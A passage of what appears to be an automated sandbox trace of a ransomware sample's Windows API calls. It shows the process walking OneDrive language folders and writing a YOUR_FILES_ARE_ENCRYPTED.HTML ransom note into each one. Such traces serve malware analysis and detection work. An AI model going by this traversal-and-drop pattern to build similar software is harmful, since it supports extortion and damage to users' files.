lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\tg" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\tg") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\tg" [0162.844] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\tg", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\tg\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\tg\\*" [0162.844] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\tg\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xab973c30, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xabaa4730, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xabaa4730, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0162.846] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xab973c30, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xabaa4730, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xabaa4730, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0162.846] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xabaa4730, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xabaa4730, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xabaa4730, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x13ca8, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0162.846] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\tg\\FileSync.LocalizedResources.dll.mui") returned 110 [0162.846] lstrcmpW (lpString1="FileSync.LocalizedResources.dll.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0162.846] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0162.846] lstrlenW (lpString=".mui") returned 4 [0162.846] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0162.846] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xabaa4730, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xabaa4730, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xabaa4730, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x13ca8, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0162.846] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0162.846] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\tg\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 104 [0162.847] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\tg\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\tg\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5ac [0162.847] WriteFile (in: hFile=0x5ac, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0162.850] CloseHandle (hObject=0x5ac) returned 1 [0162.850] GetProcessHeap () returned 0x270000 [0162.851] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74d2010 | out: hHeap=0x270000) returned 1 [0162.851] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xabaa4730, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xabbd5230, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xabbd5230, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="tg-cyrl", cAlternateFileName="")) returned 1 [0162.851] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\tg-cyrl") returned 79 [0162.851] GetProcessHeap () returned 0x270000 [0162.851] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74d2010 [0162.851] lstrcpyW (in: lpString1=0x74d2010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\tg-cyrl" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\tg-cyrl") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\tg-cyrl" [0162.851] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\tg-cyrl", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\tg-cyrl\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\tg-cyrl\\*" [0162.851] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\tg-cyrl\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xabaa4730, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xabbd5230, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xabbd5230, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0162.852] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xabaa4730, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xabbd5230, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xabbd5230, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0162.852] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xabbd5230, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xabbd5230, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xabbd5230, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x13ca8, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0162.852] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\tg-cyrl\\FileSync.LocalizedResources.dll.mui") returned 115 [0162.852] lstrcmpW (lpString1="FileSync.LocalizedResources.dll.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0162.852] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0162.852] lstrlenW (lpString=".mui") returned 4 [0162.852] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0162.852] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xabbd5230, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xabbd5230, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xabbd5230, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x13ca8, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0162.852] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0162.852] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\tg-cyrl\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 109 [0162.852] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\tg-cyrl\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\tg-cyrl\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5ac [0162.853] WriteFile (in: hFile=0x5ac, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0162.855] CloseHandle (hObject=0x5ac) returned 1 [0162.856] GetProcessHeap () returned 0x270000 [0162.856] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74d2010 | out: hHeap=0x270000) returned 1 [0162.856] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xabbd5230, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xabd05d30, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xabd05d30, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="th", cAlternateFileName="")) returned 1 [0162.857] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\th") returned 74 [0162.857] GetProcessHeap () returned 0x270000 [0162.857] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74d2010 [0162.857] lstrcpyW (in: lpString1=0x74d2010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\th" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\th") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\th" [0162.857] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\th", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\th\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\th\\*" [0162.857] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\th\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xabbd5230, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xabd05d30, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xabd05d30, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0162.858] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xabbd5230, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xabd05d30, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xabd05d30, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0162.858] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xabd05d30, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xabd05d30, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xabd05d30, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x118b0, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0162.858] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\th\\FileSync.LocalizedResources.dll.mui") returned 110 [0162.858] lstrcmpW (lpString1="FileSync.LocalizedResources.dll.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0162.858] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0162.858] lstrlenW (lpString=".mui") returned 4 [0162.858] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0162.858] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xabd05d30, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xabd05d30, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xabd05d30, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x118b0, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0162.858] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0162.859] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\th\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 104 [0162.859] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\th\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\th\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5ac [0162.859] WriteFile (in: hFile=0x5ac, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0162.862] CloseHandle (hObject=0x5ac) returned 1 [0162.863] GetProcessHeap () returned 0x270000 [0162.864] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74d2010 | out: hHeap=0x270000) returned 1 [0162.864] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xabd05d30, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xabe82af0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xabe82af0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="ti", cAlternateFileName="")) returned 1 [0162.864] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ti") returned 74 [0162.864] GetProcessHeap () returned 0x270000 [0162.864] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74d2010 [0162.864] lstrcpyW (in: lpString1=0x74d2010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ti" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ti") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ti" [0162.864] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ti", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ti\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ti\\*" [0162.864] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ti\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xabd05d30, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xabe82af0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xabe82af0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0162.864] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xabd05d30, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xabe82af0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xabe82af0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0162.864] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xabe82af0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xabe82af0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xabe82af0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0xf6b0, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0162.864] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ti\\FileSync.LocalizedResources.dll.mui") returned 110 [0162.864] lstrcmpW (lpString1="FileSync.LocalizedResources.dll.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0162.864] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0162.864] lstrlenW (lpString=".mui") returned 4 [0162.864] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0162.865] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xabe82af0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xabe82af0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xabe82af0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0xf6b0, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0162.865] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0162.865] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ti\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 104 [0162.865] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ti\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\ti\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5ac [0162.865] WriteFile (in: hFile=0x5ac, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0162.867] CloseHandle (hObject=0x5ac) returned 1 [0162.868] GetProcessHeap () returned 0x270000 [0162.868] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74d2010 | out: hHeap=0x270000) returned 1 [0162.869] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xabe82af0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xabfb35f0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xabfb35f0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="tk-tm", cAlternateFileName="")) returned 1 [0162.869] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\tk-tm") returned 77 [0162.869] GetProcessHeap () returned 0x270000 [0162.869] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74d2010 [0162.869] lstrcpyW (in: lpString1=0x74d2010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\tk-tm" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\tk-tm") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\tk-tm" [0162.869] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\tk-tm", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\tk-tm\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\tk-tm\\*" [0162.869] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\tk-tm\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xabe82af0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xabfb35f0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xabfb35f0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0162.870] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xabe82af0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xabfb35f0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xabfb35f0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0162.870] FindNextFileW 